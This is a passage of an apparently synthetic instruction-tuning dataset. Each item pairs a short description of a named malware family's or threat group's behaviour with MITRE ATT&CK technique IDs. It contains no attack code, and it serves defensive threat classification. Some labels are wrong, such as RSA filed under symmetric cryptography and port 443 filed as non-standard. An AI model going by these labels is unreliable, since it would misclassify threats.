to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LockerGoga has been observed moving around the victim network via SMB, indicating the actors behind this ransomware are manually copying files form computer to computer instead of self-propagating.", + "output": "- T1570: Lateral Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Wizard Spider has used stolen credentials to copy tools into the \"\"%TEMP%\"\" directory of domain controllers.\"", + "output": "- T1570: Lateral Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "An APT32 backdoor can use HTTP over a non-standard TCP port (e.g 14146) which is specified in the backdoor configuration.", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BADCALL communicates on ports 443 and 8000 with a FakeTLS method.", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2.", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Derusbi has used unencrypted HTTP on port 443 for C2.", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files.", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HARDRAIN binds and listens on port 443 with a FakeTLS method.", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Magic Hound malware has communicated with its C2 server over TCP port 4443 using HTTP.", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PoetRAT used TLS to encrypt communications over port 143", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chimera has encapsulated Cobalt Strike's C2 protocol in DNS and HTTPS.", + "output": "- T1572: Protocol Tunneling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Group has used the Plink utility to create SSH tunnels.", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography\n- T1572: Protocol Tunneling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT28 installed a Delphi backdoor that used a custom algorithm for C2 communications.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Attor has encrypted data symmetrically using a randomly generated Blowfish (OFB) key which is encrypted with a public RSA key.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Before being appended to image files, HAMMERTOSS commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bonadan can XOR-encrypt C2 communications.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CORESHELL C2 messages are encrypted with custom stream ciphers using six-byte or eight-byte keys.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Strike has the ability to use AES-256 symmetric encryption in CBC mode with HMAC-SHA-256 to encrypt task commands and XOR to encrypt shell code and configuration data.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ebury has encrypted C2 traffic using the client IP address, then encoded it as a hexadecimal string.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HyperStack has used RSA encryption for C2 communications.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Machete has used AES to exfiltrate documents.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mosquito uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PLAINTEE encodes C2 beacons using XOR.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Rifdoor has encrypted command and control (C2) communications with a stream cipher.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SeaDuke C2 traffic has been encrypted with RC4 and AES.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SombRAT has encrypted its C2 communications with AES.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stuxnet encodes the payload of system information sent to the command and control servers using a one byte 0xFF XOR key. Stuxnet also uses a 31-byte long static byte string to XOR data sent to command and control servers. The servers use a different static key to encrypt replies to the implant.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Winnti for Linux has used a custom TCP protocol with four-byte XOR for command and control (C2).", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "down_new has the ability to AES encrypt C2 communications.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "gh0st RAT uses RC4 and XOR to encrypt C2 traffic.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CHOPSTICK encrypts C2 communications with TLS.", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GoldMax has RSA-encrypted its communication with the C2 server.", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Machete has used TLS-encrypted FTP to exfiltrate data.", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OilRig used the Plink utility and other tools to create tunnels to C2 servers.", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "POSHSPY encrypts C2 traffic with AES and RSA.", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sliver can use mutual TLS and RSA cryptography to exchange a session key.", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sykipot uses SSL for encrypting C2 communications.", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Trojan.Karagany can secure C2 communications with SSL and TLS.", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WannaCry uses Tor for command and control traffic and routes a custom cryptographic protocol over the Tor circuit.", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WellMess can communicate to C2 with mutual TLS where client and server mutually check certificates.", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "XTunnel uses SSL/TLS and RC4 to encrypt traffic.", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "adbupd contains a copy of the OpenSSL library to encrypt C2 traffic.", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ShimRat can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls.", + "output": "- T1574: Hijack Execution Flow" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WastedLocker has performed DLL hijacking before execution.", + "output": "- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"XCSSET adds malicious file paths to the \"\"DYLD_FRAMEWORK_PATH\"\" and \"\"DYLD_LIBRARY_PATH\"\" environment variables to execute malicious code.\"", + "output": "- T1574.006: Hijack Execution Flow - Dynamic Linker Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Empire contains modules that can discover and exploit search order hijacking vulnerabilities.", + "output": "- T1574.008: Hijack Execution Flow - Path Interception by Search Order Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Empire contains modules that can discover and exploit unquoted path vulnerabilities.", + "output": "- T1574.009: Hijack Execution Flow - Path Interception by Unquoted Path" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One variant of BlackEnergy locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.", + "output": "- T1574.010: Hijack Execution Flow - Services File Permissions Weakness" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Lazarus Group has abused the \"\"KernelCallbackTable\"\" to hijack process control flow and execute shellcode.\"", + "output": "- T1574.013: Hijack Execution Flow - KernelCallbackTable" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LAPSUS$ has created new virtual machines within the target's cloud environment after leveraging credential access to cloud assets.", + "output": "- T1578.002: Modify Cloud Compute Infrastructure - Create Cloud Instance" + }, + { + "instruction": "You are 